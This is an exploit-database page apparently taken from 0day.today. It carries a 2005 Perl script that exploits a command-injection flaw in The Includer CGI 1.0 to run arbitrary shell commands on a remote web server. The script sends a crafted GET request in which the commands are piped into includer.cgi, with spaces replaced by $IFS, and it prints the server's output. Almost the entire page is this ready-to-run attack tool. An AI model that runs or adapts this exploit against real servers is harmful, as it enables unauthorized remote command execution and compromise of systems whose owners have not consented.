[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

The Includer CGI <= 1.0 Remote Command Execution (new version)

Author
GreenwooD
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-92
Category
web applications
Date add
07-04-2005
Platform
cgi
==============================================================
The Includer CGI <= 1.0 Remote Command Execution (new version)
==============================================================




                                                                                                                                                                                                                                                               #!/usr/bin/perl

############################################################
# Target - The Includer CGI <= 1.0                         #
#                                                          #
#                                                          #
# Info about bug - Stupid use "Open" function.             #
#                                                          #
############################################################
use IO::Socket;


if (@ARGV < 3)
{
  print " \n Includer CGI <= 1.0 Network Security Team - nst.void.ru\n\n";
  print " Usage: <target> <dir> <cmd>\n\n"; 
  print "   <host> - Host name of taget.\n";
  print "   <dir> - If not in dir type / symbol.\n";
  print "   <cmd> - command for execution.\n\n";
  print " Examples:\n\n";
  print "   incl_10.pl 127.0.0.1 /cgi-bin/ \"ls -la\"\n";
  print "   incl_10.pl 127.0.0.1 / \"uname -a\"\n";
  print "   incl_10.pl www.test.com / \"ps auxw\"\n";
  exit();
}


$serv = $ARGV[0];
$serv =~ s/http:\/\///ge;

$dir = $ARGV[1];
$cmd = $cmde = $ARGV[2];
  
print "\n ===[ Info for query ]========================\n";   
print " = Target: $serv\n";
print " = Dir: $dir\n";
print " = Cmd: $cmd\n";
print " =============================================\n\n";   

$cmde =~ s/ /"\$IFS"/ge;

$req  = "GET http://$serv";                                      
$req .= "$dir";
$req .= "includer.cgi?|echo\$IFS\"_N_\";$cmde;echo\$IFS\"_T_\"| HTTP/1.0\n\n";


$s = IO::Socket::INET->new(Proto=>"tcp",
                           PeerAddr=>"$serv",
                           PeerPort=>80) or die " (-) - Can't connect to the server\n";

print $s $req;

$flag = 0;

while ($ans = <$s>)

 {
   if ($ans =~ /_T_/) { print " =========================================================\n"; exit() }
   if ($flag == 1) { print " $ans"; }
   if ($ans =~ /^_N_/) { print " ===[ Executed command $cmd ]===============================\n"; $flag = 1 }
   
 }



#  0day.today [2024-11-15]  #